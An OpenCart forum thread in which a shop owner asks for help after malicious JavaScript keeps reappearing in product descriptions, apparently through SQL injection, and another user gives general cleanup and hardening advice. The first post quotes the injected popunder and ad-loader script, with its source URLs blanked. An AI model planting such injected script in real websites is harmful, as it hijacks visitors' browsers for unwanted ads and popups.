Post by motofox » Sun Jul 30, 2017 7:45 pm

Hi, my site has been injected with a java script code hidden on everypage that causes popups for users.

my host advised me that it was slq injected and i needed to change the database passwords which i have done, then rolled back the database to one that was clean from a previous date and it was okay for a couple of days but now its back.

below is a sample of the code that appears when i press the source button in oc in the discription.
Can anyone advise how to stop this happening in a not too technical format, im not familiar with code.

<p><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
"popUnder": {
"enabled": true
var script = document.createElement('script');
script.async = true;
script.src = '//';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
//]]></script><script data-cfasync='false' type='text/javascript' src='//'></script><script type="text/javascript" src="//"></script><script async="async" type="text/javascript" src="//"></script></p>



Wed Nov 19, 2014 10:44 pm

Post by IP_CAM » Mon Jul 31, 2017 2:32 am

Well, your Problem cannot be solved by some Forum Assistance, you'll need
a Professional, looking into your Site, Code, and DB, to find out first, how and why
someone could be able, to implement bad code on your Site.

I would rather advise you, to clean out the existing Shop Directory on the Server,
and then, upload a clean new piece of the same Software, after downloading, and
checking the DB for it's Content first. And then, make sure, that the new Software is
secured according standards, by possible use of some existing free Extensions,
like Secure Admin, and correctly CHMOD'ing Subs and Files, e.t.c., and also removing
possibly existing USER-UPLOAD Functions and such open Doors, always just
potentially endangering Systems. :'(

Just to give you some Ideas. But if you need assistance, just MAKE SURE, not to select
anyone, Web-UNKNOWN by a real Name, Address and a personally registered Site, it's
not worth the Risk, one takes, it one deals with people, hiding behind trees and bushes,
for what reason ever...
Good Luck ! ;)

Please don't send me OC Forum Personal Messages, just contact:
OC LIGHT Test Site:
OC V-PRO Test Site:
My Github OC Site:
2'600+ FREE OC Extensions on the World's largest Github OC Repository Archive Site.

User avatar
Legendary Member


Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: Google [Bot], hathu12 and 24 guests